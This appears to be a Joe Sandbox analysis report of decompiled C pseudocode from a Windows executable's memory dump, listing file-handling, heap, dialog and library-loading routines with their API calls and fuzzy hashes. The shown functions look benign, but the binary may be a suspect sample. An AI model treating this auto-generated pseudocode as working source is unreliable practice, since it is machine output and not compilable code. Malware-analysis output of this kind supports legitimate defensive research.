                                                    					_t39 = _a4100;
                                                    					__eflags = 0;
                                                    					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
                                                    				}
                                                    				 *(_t46 + 8) = _t29;
                                                    				if(_t29 == 0xffffffff && E00CCBB03(_t39,  &_v0, 0x800) != 0) {
                                                    					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
                                                    				}
                                                    				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
                                                    				 *((char*)(_t46 + 0x1c)) = 1;
                                                    				 *((char*)(_t46 + 0x15)) = 0;
                                                    				return E00CD0602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
                                                    			}












                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CC9F27,?,?,00CC771A), ref: 00CC96E6
                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CC9F27,?,?,00CC771A), ref: 00CC9716
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                    • Instruction ID: 8df1a19b186a8d0106ef92e29b54e20eb7bf4ec7ea910ae76e8c5b71eadffa96
                                                    • Opcode Fuzzy Hash: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                    • Instruction Fuzzy Hash: 4F21BDB15003446FE3708A65CC89FB7B7DCEB49324F100A1DFAA5C62D1C774A9849631
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00CC9E80(void* __ecx) {
                                                    				long _v8;
                                                    				void* __ebp;
                                                    				long _t13;
                                                    				long _t15;
                                                    				signed int _t17;
                                                    				char* _t33;
                                                    				void* _t36;
                                                    				long _t37;
                                                    				void* _t39;
                                                    
                                                    				_push(__ecx);
                                                    				_t36 = __ecx;
                                                    				_t33 = __ecx + 0x1e;
                                                    				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
                                                    					_t21 = __ecx + 0x32;
                                                    					goto L4;
                                                    				} else {
                                                    					if( *_t33 == 0) {
                                                    						L12:
                                                    						_t17 = _t13 | 0xffffffff;
                                                    					} else {
                                                    						_t21 = __ecx + 0x32;
                                                    						E00CC6D5B(0xd01098, _t39, __ecx + 0x32);
                                                    						L4:
                                                    						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
                                                    							_v8 = _v8 & 0x00000000;
                                                    							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
                                                    							_t37 = _t15;
                                                    							if(_t37 != 0xffffffff) {
                                                    								L10:
                                                    								asm("cdq");
                                                    								_t17 = 0 + _t37;
                                                    								asm("adc edx, 0x0");
                                                    							} else {
                                                    								_t13 = GetLastError();
                                                    								if(_t13 == 0) {
                                                    									goto L10;
                                                    								} else {
                                                    									if( *_t33 == 0) {
                                                    										goto L12;
                                                    									} else {
                                                    										E00CC6D5B(0xd01098, _t39, _t21);
                                                    										goto L10;
                                                    									}
                                                    								}
                                                    							}
                                                    						} else {
                                                    							_t17 =  *(_t36 + 0x28);
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t17;
                                                    			}













                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CC9EC7
                                                    • GetLastError.KERNEL32 ref: 00CC9ED4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                    • Instruction ID: 2b3f81c6511420551fe6cfc9a0473ccbf0e1641021b997f2e09289bfabcdde78
                                                    • Opcode Fuzzy Hash: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                    • Instruction Fuzzy Hash: 6811A571600700ABD724C669C849FA6B7E9EB55360F504A2DE563D26D0D7B0EE45C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E00CE8E54(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                    				void* _t4;
                                                    				long _t7;
                                                    				void* _t9;
                                                    				void* _t13;
                                                    				void* _t14;
                                                    				long _t16;
                                                    
                                                    				_t13 = __edx;
                                                    				_t10 = __ecx;
                                                    				_t14 = _a4;
                                                    				if(_t14 != 0) {
                                                    					_t16 = _a8;
                                                    					__eflags = _t16;
                                                    					if(_t16 != 0) {
                                                    						__eflags = _t16 - 0xffffffe0;
                                                    						if(_t16 <= 0xffffffe0) {
                                                    							while(1) {
                                                    								_t4 = RtlReAllocateHeap( *0xd226e4, 0, _t14, _t16); // executed
                                                    								__eflags = _t4;
                                                    								if(_t4 != 0) {
                                                    									break;
                                                    								}
                                                    								__eflags = E00CE8C34();
                                                    								if(__eflags == 0) {
                                                    									goto L5;
                                                    								}
                                                    								_t7 = E00CE7A5E(_t10, _t13, __eflags, _t16);
                                                    								_pop(_t10);
                                                    								__eflags = _t7;
                                                    								if(_t7 == 0) {
                                                    									goto L5;
                                                    								}
                                                    							}
                                                    							L7:
                                                    							return _t4;
                                                    						}
                                                    						L5:
                                                    						 *((intOrPtr*)(E00CE91A8())) = 0xc;
                                                    						L6:
                                                    						_t4 = 0;
                                                    						__eflags = 0;
                                                    						goto L7;
                                                    					}
                                                    					E00CE8DCC(_t14);
                                                    					goto L6;
                                                    				}
                                                    				_t9 = E00CE8E06(__ecx, _a8); // executed
                                                    				return _t9;
                                                    			}










                                                    APIs
                                                    • _free.LIBCMT ref: 00CE8E75
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00D01098,00CC17CE,?,?,00000007,?,?,?,00CC13D6,?,00000000), ref: 00CE8EB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap$_free
                                                    • String ID:
                                                    • API String ID: 1482568997-0
                                                    • Opcode ID: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                    • Instruction ID: b6f82b6f933a8d4937c7ca7e1e9cfa0b6afc874cfeeb31376959461a5052db0e
                                                    • Opcode Fuzzy Hash: 79c70cfafa544db70ea441021aed409da36e16570049ac987e0daa5763fcb100
                                                    • Instruction Fuzzy Hash: 32F0F63A2012C27ADB212A279C05F6F37588F82B70F680125F82CA7191DF74CE08A1A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CD109E(void* __ecx) {
                                                    				long _v8;
                                                    				long _v12;
                                                    				int _t8;
                                                    				void* _t14;
                                                    				signed int _t15;
                                                    				signed int _t17;
                                                    
                                                    				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
                                                    				if(_t8 != 0) {
                                                    					_t14 = 0;
                                                    					_t17 = _v8;
                                                    					_t15 = 1;
                                                    					do {
                                                    						if((_t17 & _t15) != 0) {
                                                    							_t14 = _t14 + 1;
                                                    						}
                                                    						_t15 = _t15 + _t15;
                                                    					} while (_t15 != 0);
                                                    					if(_t14 >= 1) {
                                                    						return _t14;
                                                    					}
                                                    					return 1;
                                                    				} else {
                                                    					return _t8 + 1;
                                                    				}
                                                    			}










                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00CD10AB
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00CD10B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                    • Instruction ID: 838c8e4d8be9534f84defd4e27eac4ad653253b08083e454225c31d6ec892772
                                                    • Opcode Fuzzy Hash: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                    • Instruction Fuzzy Hash: 03E09272B10185B78F0997A49C05ABF72DEEA442443184177EA13D3201F934EF418760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCA4ED(WCHAR* _a4, long _a8) {
                                                    				short _v4100;
                                                    				int _t13;
                                                    				signed int _t19;
                                                    				signed int _t20;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t13 = SetFileAttributesW(_a4, _a8); // executed
                                                    				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
                                                    				if(_t13 == 0 && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
                                                    					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
                                                    				}
                                                    				return _t20;
                                                    			}








                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCA1E0(WCHAR* _a4) {
                                                    				short _v4100;
                                                    				int _t11;
                                                    				signed int _t17;
                                                    				signed int _t18;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t11 = DeleteFileW(_a4); // executed
                                                    				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
                                                    				if(_t11 == 0 && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
                                                    					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
                                                    				}
                                                    				return _t18;
                                                    			}








                                                    APIs
                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                    Similarity
                                                    • API ID: DeleteFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2643169976-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E00CDAC7C(void* __ecx) {
                                                    				intOrPtr _v16;
                                                    				intOrPtr* _t5;
                                                    				void* _t8;
                                                    				void* _t13;
                                                    				void* _t16;
                                                    				intOrPtr _t19;
                                                    
                                                    				 *[fs:0x0] = _t19;
                                                    				_t5 =  *0xd08438; // 0x76f5c100
                                                    				 *0xcf3278(_t5, _t13, _t16,  *[fs:0x0], 0xcf2641, 0xffffffff);
                                                    				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
                                                    				L00CDEB32(); // executed
                                                    				_t8 =  *0xd23178( *((intOrPtr*)(__ecx + 4))); // executed
                                                    				 *[fs:0x0] = _v16;
                                                    				return _t8;
                                                    			}










                                                    APIs
                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00CF2641,000000FF), ref: 00CDACB0
                                                    • OleUninitialize.OLE32(?,?,?,?,00CF2641,000000FF), ref: 00CDACB5
                                                    Similarity
                                                    • API ID: GdiplusShutdownUninitialize
                                                    • String ID:
                                                    • API String ID: 3856339756-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCA243(WCHAR* _a4) {
                                                    				short _v4100;
                                                    				long _t7;
                                                    				long _t12;
                                                    				long _t13;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t7 = GetFileAttributesW(_a4); // executed
                                                    				_t13 = _t7;
                                                    				if(_t13 == 0xffffffff && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
                                                    					_t12 = GetFileAttributesW( &_v4100); // executed
                                                    					_t13 = _t12;
                                                    				}
                                                    				return _t13;
                                                    			}








                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA254
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA280
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDDEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
                                                    				short _v5124;
                                                    				signed int _t16;
                                                    
                                                    				E00CDEC50(0x1400);
                                                    				E00CC4092( &_v5124, 0xa00, E00CCE617((_a16 & 0x000000ff) + 0x65), _a4);
                                                    				SetDlgItemTextW( *0xd08458, 0x65,  &_v5124); // executed
                                                    				_t16 = E00CDB568(); // executed
                                                    				return _t16 & 0xffffff00 |  *0xd08454 == 0x00000000;
                                                    			}






                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CDDEEC
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00CDDF03
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                    • String ID:
                                                    • API String ID: 2718869927-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CD081B(intOrPtr _a4) {
                                                    				short _v4100;
                                                    				int _t8;
                                                    				struct HINSTANCE__* _t12;
                                                    
                                                    				E00CDEC50(0x1000);
                                                    				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
                                                    				_t14 = _t8;
                                                    				if(_t8 != 0) {
                                                    					E00CCBDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
                                                    					_t12 = LoadLibraryW( &_v4100); // executed
                                                    					return _t12;
                                                    				}
                                                    				return _t8;
                                                    			}







                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystem
                                                    • String ID:
                                                    • API String ID: 1175261203-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00CDA3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				signed int* _t10;
                                                    				signed int _t15;
                                                    
                                                    				_push(__ecx);
                                                    				_t15 = __ecx;
                                                    				_t10 =  &_v8;
                                                    				_v8 = __ecx;
                                                    				_v8 = _v8 & 0x00000000;
                                                    				_push(_t10);
                                                    				_push(_a4);
                                                    				 *__ecx = 0xcf4740;
                                                    				if(_a8 == 0) {
                                                    					L00CDEB1A(); // executed
                                                    				} else {
                                                    					L00CDEB20();
                                                    				}
                                                    				 *((intOrPtr*)(_t15 + 8)) = _t10;
                                                    				 *(_t15 + 4) = _v8;
                                                    				return _t15;
                                                    			}







                                                    APIs
                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CDA3E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: BitmapCreateFromGdipStream
                                                    • String ID:
                                                    • API String ID: 1918208029-0
                                                    • Opcode ID: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                    • Instruction ID: fa14efc77a776fa9127a3f7d45163464c1a3db1f40bd62315043f94595e2d662
                                                    • Opcode Fuzzy Hash: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                    • Instruction Fuzzy Hash: 00E0ED71500218EBCB50EF55C54179ABBE8EB04360F10805BAA9697351E374FF04DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E00CE2B8C(void* __ecx, void* __eflags) {
                                                    				intOrPtr _t1;
                                                    				void* _t2;
                                                    				void* _t7;
                                                    				void* _t9;
                                                    
                                                    				_t1 = E00CE3C57(__ecx, __eflags, E00CE2AD0); // executed
                                                    				 *0xcfe7d0 = _t1;
                                                    				_pop(_t7);
                                                    				if(_t1 != 0xffffffff) {
                                                    					_t2 = E00CE3D08(_t7, __eflags, _t1, 0xd22060);
                                                    					_pop(_t9);
                                                    					__eflags = _t2;
                                                    					if(_t2 != 0) {
                                                    						return 1;
                                                    					} else {
                                                    						E00CE2BBF(_t9);
                                                    						goto L1;
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					return 0;
                                                    				}
                                                    			}








                                                    APIs
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2BAA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CE2BB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1660781231-0
                                                    • Opcode ID: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                    • Instruction ID: 379308dc263a6dd2451f81de652551865d73416027ee4bb639b9d8bf98a164ba
                                                    • Opcode Fuzzy Hash: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                    • Instruction Fuzzy Hash: F2D022741643C02A4C243E733D0BF79338EAD51B787B00BAAF0328A4C1EE51A280B022
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00CC12F1(struct HWND__* _a4, int _a8, signed char _a12) {
                                                    				int _t8;
                                                    
                                                    				asm("sbb eax, eax");
                                                    				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
                                                    				return _t8;
                                                    			}





                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemShowWindow
                                                    • String ID:
                                                    • API String ID: 3351165006-0
                                                    • Opcode ID: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                    • Instruction ID: b268c6533427a23339467070f0941eccecf81cacc6b726044713af81d6a3c8a4
                                                    • Opcode Fuzzy Hash: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                    • Instruction Fuzzy Hash: 41C0123205C300BECB020BB4DC09C2BBBA8ABA5312F04C908B0A5C0260C23CC130DF21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 62%
                                                    			E00CC1A04(intOrPtr* __ecx, void* __edx) {
                                                    				void* __esi;
                                                    				char _t101;
                                                    				signed int _t103;
                                                    				intOrPtr _t107;
                                                    				signed int _t109;
                                                    				signed int _t111;
                                                    				signed int _t113;
                                                    				signed int _t114;
                                                    				void* _t119;
                                                    				signed int _t125;
                                                    				intOrPtr _t126;
                                                    				char _t127;
                                                    				char _t137;
                                                    				intOrPtr _t142;
                                                    				signed int _t143;
                                                    				void* _t146;
                                                    				signed int _t151;
                                                    				signed int _t155;
                                                    				void* _t160;
                                                    				void* _t162;
                                                    				void* _t166;
                                                    				intOrPtr* _t167;
                                                    				signed int _t181;
                                                    				void* _t182;
                                                    				signed int _t184;
                                                    				char* _t198;
                                                    				intOrPtr _t199;
                                                    				signed int _t200;
                                                    				void* _t210;
                                                    				void* _t211;
                                                    				intOrPtr _t212;
                                                    				void* _t214;
                                                    				char* _t215;
                                                    				intOrPtr _t216;
                                                    				void* _t217;
                                                    				void* _t224;
                                                    				void* _t226;
                                                    
                                                    				_t210 = __edx;
                                                    				E00CDEB78(0xcf265a, _t226);
                                                    				_t167 = __ecx;
                                                    				_t212 = 7;
                                                    				 *((char*)(__ecx + 0x6cd4)) = 0;
                                                    				 *((char*)(__ecx + 0x6cdc)) = 0;
                                                    				 *0xcf3278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
                                                    					L23:
                                                    					_t101 = 0;
                                                    					L24:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
                                                    					return _t101;
                                                    				}
                                                    				_t220 = 0;
                                                    				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
                                                    				_t103 = E00CC1DF8(__ecx + 0x2210, _t212);
                                                    				if(_t103 == 0) {
                                                    					E00CC13BA(_t226 - 0x38, 0x200000);
                                                    					 *(_t226 - 4) = 0;
                                                    					 *0xcf3278();
                                                    					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
                                                    					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
                                                    					 *0xcf3278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
                                                    					_t109 =  *( *_t167 + 0xc)();
                                                    					_t181 = _t109;
                                                    					_t220 = 0;
                                                    					 *(_t226 - 0x14) = _t181;
                                                    					__eflags = _t181;
                                                    					if(_t181 <= 0) {
                                                    						L21:
                                                    						__eflags =  *(_t167 + 0x6cd8);
                                                    						_t182 = _t226 - 0x38;
                                                    						if( *(_t167 + 0x6cd8) != 0) {
                                                    							_t38 = _t226 - 4; // executed
                                                    							 *_t38 =  *(_t226 - 4) | 0xffffffff;
